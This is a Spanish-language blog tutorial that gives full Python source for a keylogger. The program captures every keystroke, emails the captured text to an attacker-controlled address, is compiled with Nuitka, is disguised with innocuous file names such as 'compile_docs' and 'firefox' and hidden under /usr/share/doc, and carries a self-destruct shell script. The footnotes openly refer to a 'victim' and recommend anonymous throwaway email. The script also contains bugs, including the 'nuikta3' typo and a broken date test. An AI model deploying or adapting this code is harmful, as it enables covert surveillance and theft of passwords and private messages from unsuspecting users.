Author: Jorge Maldonado Ventura
Category: Python
Date: 2023-02-01 21:00
Lang: es
Slug: registrador-de-teclas-keylogger-avanzado-en-python-para-gnu-linux
Tags: registrador de teclas, hack, keylogger, macOS, Python, seguridad, Windows
Title: Registrador de teclas (<i lang="en">keylogger</i>) en Python para GNU/Linux. Enviar información por correo y autodestruirse
Image: <img src="/wp-content/uploads/2023/02/registrador-de-teclas-con-Python.png" alt="" width="1200" height="675" srcset="/wp-content/uploads/2023/02/registrador-de-teclas-con-Python.png 1200w, /wp-content/uploads/2023/02/registrador-de-teclas-con-Python-600x337.png 600w" sizes="(max-width: 1200px) 100vw, 1200px">

En este artículo enseño como programar un <i lang="en">keylogger</i>
avanzado que envía mensajes por correo electrónico y se autodestruye
después de una fecha concreta.

<!-- more -->

El código (lo guardamos como `compile_docs.py`[^1]) utilizado es el siguiente:

    :::python
    #!/usr/bin/env python3
    from pynput.keyboard import Key, Listener
    from email.message import EmailMessage
    import smtplib, ssl

    keys = ''

    def on_press(key):
        print(key)
        global keys, count
        keys += str(key)
        print(len(keys),  keys)
        if len(keys) > 190:
            send_email(keys)
            keys = ''

    def send_email(message):
        smtp_server = "CHANGE"
        port = 587
        sender_email = "CHANGE"
        password = "CHANGE"
        receiver_email = sender_email


        em = EmailMessage()
        em.set_content(message)
        em['To'] = receiver_email
        em['From'] = sender_email
        em['Subject'] = 'keylog'

        context = ssl.create_default_context()

        with smtplib.SMTP(smtp_server, port) as s:
            s.ehlo()
            s.starttls(context=context)
            s.ehlo()
            s.login(sender_email, password)
            s.send_message(em)

    with Listener(on_press=on_press) as listener:
        listener.join()

Debemos reemplazar lo que pone `CHANGE` con información para el envío
del correo electrónico. Obviamente, el correo electrónico utilizado ha
de ser uno anónimo de usar y tirar. Básicamente, con el código anterior
enviamos un correo cada vez que se pulsen varias teclas (cuando ocupan
`190` caracteres).

Ahora vamos a compilar el código con [Nuitka](https://nuitka.net/):

    :::bash
    sudo pip3 install nuitka
    nuikta3 compile_docs.py

El programa habrá producido un archivo compilado llamado
`compile_docs.bin`. Finalmente, hay que hacer que se ejecute ese
archivo al iniciar un navegador o al arrancar el ordenador, [como
expliqué en el artículo anterior](/registrador-de-teclas-i-langenkeyloggeri-básico-para-gnulinux/#paso2).

Si queremos hacer que el programa se autodestruya tras un período de
tiempo, podemos crear algo así[^2]:

    :::bash
    #!/bin/sh
    DATE=`date +%Y%m%d`
    if [ $DATE > 20230501 ]; then
        rm /usr/share/doc/python3/compile_docs.py
        rm /usr/share/doc/python3/compile_docs.bin
        mv firefox.bin $0  # Elimina este archivo
    else
        python3 nuestro_keylogger.py
    fi

Los pasos para eliminar el <i lang="en">keylogger</i> pueden variar un
poco dependiendo de cómo lo hayas ocultado.

[^1]: Este es un nombre de ejemplo, lo ideal es usar un nombre que no
    llame la atención de nuestra víctima.
[^2]: El archivo se guardaría como `firefox` o algún programa similar.
